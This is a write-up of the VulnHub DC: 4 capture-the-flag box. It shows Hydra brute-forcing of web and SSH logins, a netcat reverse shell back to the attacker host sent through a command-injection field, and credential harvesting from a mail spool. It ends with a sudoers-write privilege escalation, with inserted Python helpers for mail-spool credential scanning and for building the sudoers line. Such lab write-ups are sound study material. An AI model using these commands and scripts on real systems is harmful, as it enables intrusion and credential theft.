
[Information Security] VulnHub – DC: 4 Write-up


With 4 of the 9 boxes in the DC series done, there is a fair chance of finishing the whole series before the new year. So far the difficulty is still entry-level, so solving them is mostly a refresher of the fundamentals. DC: 4 did, however, bring in some tools I rarely touch day to day, such as Hydra and wfuzz.

Environment setup

VirtualBox: Kali & DC: 4
Net Config: NAT Network

Finding the target

$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 09:59 CST
Nmap scan report for 10.0.2.1
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0016s latency).
Nmap scan report for 10.0.2.7
Host is up (0.0023s latency).
Nmap scan report for 10.0.2.15
Host is up (0.0011s latency).

$ nmap 10.0.2.7 -p- -A 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 10:00 CST
Nmap scan report for 10.0.2.7
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Walkthrough

Browsing straight to port 80 gives a rather plain login page. Viewing the page source confirms it is nothing more than a simple form-based login, and a few common weak passwords tried by hand went nowhere.

Directory brute-forcing

Directory brute-forcing turned up nothing interesting; the only thing to work with is the login form on the front page. (command.php, login.php and logout.php all 302 back to index.php when requested without a session, so they are only reachable after logging in.)

$ python3 dirsearch.py -u http://10.0.2.7/ -w db/all.txt -e *                                                             

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760

Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-02_10-16-53.log

Target: http://10.0.2.7/

[10:16:53] Starting: 
[10:17:02] 403 -  170B  - /images/
[10:17:12] 403 -  556B  - /css/
[10:17:56] 200 -  506B  - /index.php
[10:19:03] 302 -  704B  - /command.php  ->  index.php 
[10:19:04] 302 -  206B  - /login.php  ->  index.php 
[10:20:43] 302 -  163B  - /logout.php  ->  index.php                             
Task Completed 

Attempting to log in

Besides the initial weak-password guesses, I also tried a few simple SQL injection strings against the login, none of which worked. In the end THC-Hydra brute-forced the form and logged in successfully as admin/happy.

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.0.2.7 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 10:30:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.0.2.7:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 10.0.2.7   login: admin   password: happy
[STATUS] attack finished for 10.0.2.7 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

I was stuck on THC-Hydra for quite a while because I was unfamiliar with the tool: a failed login on this form does not echo back any error text, so there is no failure string for Hydra's default condition to match on. The post brute-forcing-passwords-with-thc-hydra pointed out that the condition string at the end of the http-post-form module can be prefixed with S= to match a success string instead of a failure string. The S=logout in the command above is the assumption that a successful login renders a page containing the word "logout" (the logout link). One check worth doing before a long run: confirm the success string is absent from the response to a deliberately wrong password, otherwise every candidate will be reported as valid. -F tells Hydra to stop as soon as the first valid pair is found.

Get Shell

After logging in there is a single feature, Command, at the same path (command.php) the directory brute-force had already turned up during reconnaissance.

The feature offers three options; trying them and looking at the output makes it clear that raw system command output is being printed straight into the page.

Opening the browser's developer tools and watching the submitted request turns up an even bigger surprise: the command itself is sent from the client. Whether or not it is filtered on the server, this is obviously an unsafe design.

Since the radio button's value is under the client's control, this is an opportunity for RCE (Remote Code Execution): replace the value with a command that throws a reverse shell back to the attacker.

Listener (attacker machine, 10.0.2.15)

nc -nl -vv -p 8080

Payload submitted as the radio value on the victim (URL-encoded as seen in the request, then decoded)

nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080

Privilege escalation

With the reverse shell in hand, upgrade it to an interactive TTY with python and start gathering more information.

python -c "import pty;pty.spawn('/bin/bash')"

SUID check

www-data@dc-4:/$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping

Linux exploit suggester

I used to check uname -a, lsb_release -a and similar by hand; linux-exploit-suggester is a handy tool that collects that system information quickly and lists the exploits that might apply. (After the wget the script still has to be made executable with chmod +x, or run through bash, before it will execute.)

www-data@dc-4:/tmp$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
www-data@dc-4:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 4.9.0
Architecture: i686
Distribution: debian
Distribution version: 9
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-10149] raptor_exim_wiz

   Details: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/46996

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

None of this seemed to help with escalation on this box (the one "probable" kernel candidate is tagged for the amd64 build of the Debian 9 kernel, while this machine runs the i686 build). Looking through /etc/passwd shows three regular users, charles, jim and sam, so the next idea is whether THC-Hydra can brute-force their SSH logins.

hydra -s 22 -v -l charles -P /usr/share/wordlists/rockyou.txt 10.0.2.7 ssh

rockyou.txt is far too large for this: each of the three accounts ran for about ten minutes before I gave up. Searching the filesystem for other information instead, find turned up a file old-passwords.bak under jim's home directory that looks like a password dictionary.

www-data@dc-4:~$ find / -name "*.bak" 2>&1 | grep -v "Permission denied"
/home/jim/backups/old-passwords.bak

www-data@dc-4:~$ cat /home/jim/backups/old-passwords.bak
000000
12345
iloveyou

...

123456k
icecream
popcorn1

So I took that dictionary, saved it on the attacker machine as dc4_jim_password_list.txt, and ran THC-Hydra against SSH with it; it found the password jibril04.

$ hydra -s 22 -v -l jim -P dc4_jim_password_list.txt 10.0.2.7 ssh 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 14:38:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://10.0.2.7:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jim@10.0.2.7:22
[INFO] Successful, password authentication is supported by ssh://10.0.2.7:22
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 77 to do in 00:01h, 16 active
[VERBOSE] Retrying connection for child 11
[22][ssh] host: 10.0.2.7   login: jim   password: jibril04
[STATUS] attack finished for 10.0.2.7 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-02 14:40:25

Login via SSH

Logging in with ssh from the attacker machine works, and the exploration begins. One line in the login banner caught my eye: You have mail. Not knowing Linux that well, I wasn't sure whether this was canned login text or whether there was actually mail to collect somewhere. (It is the latter: login prints this when the user's mail spool, /var/mail/<user>, contains mail.)

$ ssh jim@10.0.2.7
The authenticity of host '10.0.2.7 (10.0.2.7)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.7' (ECDSA) to the list of known hosts.
jim@10.0.2.7's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100

The mail is in /var/mail/jim and can simply be read with cat.

jim@dc-4:~$ cat /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles
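As an added example (not from the original write-up), here is a small scanner that pulls credential-looking lines out of an mbox spool such as /var/mail/jim, so the "You have mail" hint can be checked for every readable spool in one pass instead of reading each by hand. The embedded mbox is constructed for the demo and mirrors the layout of Charles's message; the regex is an assumption about what a leaked-password line looks like, not something the page defines.

```python
"""Added example, not part of the original write-up: find credentials handed
out in mbox-format mail spools (/var/mail/<user>).  SAMPLE_MBOX is CONSTRUCTED
for the demo and mirrors the layout of the "Holidays" mail on the page."""
import email
import email.policy
import os
import re
from typing import List, Tuple

# Matches "Password is: X", "Password: X", "pass=X" at the start of a line.
# \S+ keeps symbols such as ^ and & (as in the DC-4 password) intact.
CRED_RE = re.compile(
    r"(?im)^\s*(?:the\s+)?(?:new\s+)?pass(?:word|wd)?\s*(?:is)?\s*[:=]\s*(\S+)")

SAMPLE_MBOX = """\
From charles@dc-4 Sat Apr 06 21:15:46 2019
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

From sam@dc-4 Mon Apr 08 09:00:00 2019
To: jim@dc-4
Subject: Lunch
From: Sam <sam@dc-4>
Date: Mon, 08 Apr 2019 09:00:00 +1000

No secrets here, just lunch at noon.
"""


def split_mbox(text: str) -> List[str]:
    """Split an mbox blob into raw messages on the 'From ' envelope line."""
    return [m for m in re.split(r"(?m)^From .*$\n", text) if m.strip()]


def harvest_credentials(mbox_text: str) -> List[Tuple[str, str, str]]:
    """Return (sender, subject, secret) for each credential-looking line."""
    hits = []
    for raw in split_mbox(mbox_text):
        msg = email.message_from_string(raw, policy=email.policy.default)
        body = msg.get_body(preferencelist=("plain",))
        text = body.get_content() if body is not None else ""
        for secret in CRED_RE.findall(text):
            hits.append((str(msg.get("From", "")), str(msg.get("Subject", "")), secret))
    return hits


def harvest_spools(directory: str = "/var/mail") -> List[Tuple[str, str, str, str]]:
    """Scan every spool we can read; unreadable ones are skipped silently."""
    results = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue
        results.extend((name,) + hit for hit in harvest_credentials(text))
    return results


if __name__ == "__main__":
    for sender, subject, secret in harvest_credentials(SAMPLE_MBOX):
        print(f"{sender!s:32} {subject!s:12} {secret}")
```

On a real box, harvest_spools() walks /var/mail as the current user; as jim it finds Charles's password in the same way, and as root it covers every user's spool.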

Privilege escalation via teehee

That gives charles's password. su charles switches to that account directly, and sudo -l shows that /usr/bin/teehee can be run as root without a password.

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

teehee is not a program I recognised, so teehee --help is the first thing to check.

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

It is plainly just tee under another name: it copies stdin to stdout and to any files given, and because it runs via sudo it writes those files as root. So the idea is to write a rule into sudoers. This step also cost some time: I accidentally typed the parentheses in ALL=(ALL:ALL) as braces {}, which broke sudo outright and meant redeploying the box several times. A syntax error anywhere in sudoers makes sudo refuse to run at all, so the line has to be exact. Two further caveats: without -a, teehee truncates /etc/sudoers and replaces it with the single new line (that still works here only because the new line grants charles everything; appending with -a is the safer habit, and the line should be newline-terminated), and since the rule carries no NOPASSWD tag, sudo su prompts for charles's password, which is already known.
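As an added example (not the author's code), a small validator for the sudoers line before it is fed to the root-level tee. It rejects the {} typo described above, requires an absolute command path, terminates the line with a newline and emits the appending form of the pipeline. The grammar it checks is a deliberately strict subset of sudoers syntax, an assumption sufficient for one-line user specs, not a full parser.

```python
"""Added example, not from the original write-up: sanity-check a sudoers rule
before handing it to a root-level file write such as `sudo teehee`.  A single
malformed line makes sudo refuse to run, so validate first.  RULE_RE is a
strict subset of sudoers syntax (an assumption good enough for one-line
`user host=(runas[:group]) [TAG:] command` rules, not a full parser)."""
import re
import shlex

RULE_RE = re.compile(
    r"^(?P<user>%?[A-Za-z_][A-Za-z0-9_.-]*)\s+"              # user or %group
    r"(?P<host>[A-Za-z0-9_.-]+)\s*=\s*"                       # host list
    r"\((?P<runas>[A-Za-z_][A-Za-z0-9_-]*)"                    # (runas
    r"(?::(?P<group>[A-Za-z_][A-Za-z0-9_-]*))?\)\s*"          #  [:group])
    r"(?P<tags>(?:(?:NO)?(?:PASSWD|EXEC|SETENV):\s*)*)"        # optional tags
    r"(?P<cmd>\S+(?:\s[^,]*)?)$"                               # command
)


def build_rule(user: str, runas: str = "ALL", group: str = "ALL",
               cmd: str = "ALL", nopasswd: bool = False) -> str:
    """Compose `user ALL=(runas:group) [NOPASSWD:] cmd`."""
    tag = "NOPASSWD: " if nopasswd else ""
    return f"{user} ALL=({runas}:{group}) {tag}{cmd}"


def validate_rule(line: str):
    """Return None if the line looks like a valid user spec, else the reason."""
    line = line.strip()
    if "{" in line or "}" in line:
        return "braces are not sudoers syntax: the runas list uses ( )"
    if "\n" in line:
        return "one rule per line"
    m = RULE_RE.match(line)
    if m is None:
        return "does not match `user host=(runas[:group]) [NOPASSWD:] command`"
    if m["cmd"] != "ALL" and not m["cmd"].startswith("/"):
        return "commands must be ALL or an absolute path"
    return None


def sudoers_payload(line: str) -> str:
    """Validated, newline-terminated text to append."""
    err = validate_rule(line)
    if err is not None:
        raise ValueError(err)
    return line.strip() + "\n"


def tee_command(line: str, path: str = "/etc/sudoers",
                tee: str = "sudo teehee") -> str:
    """Shell pipeline that APPENDS the rule; -a keeps the existing sudoers."""
    rule = sudoers_payload(line).rstrip("\n")
    return f"printf '%s\\n' {shlex.quote(rule)} | {tee} -a {path} >/dev/null"


if __name__ == "__main__":
    for candidate in (build_rule("charles"), "charles ALL={ALL:ALL} ALL"):
        print(f"{candidate!r}: {validate_rule(candidate) or 'ok'}")
    print(tee_command(build_rule("charles")))
```

After appending, `sudo -l` as charles is the cheap confirmation that the rule parsed and applies, before spending a password prompt on `sudo su`.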

charles@dc-4:~$ echo -en "charles ALL=(ALL:ALL) ALL" | sudo teehee /etc/sudoers
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# whoami
root
root@dc-4:~# cat flag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.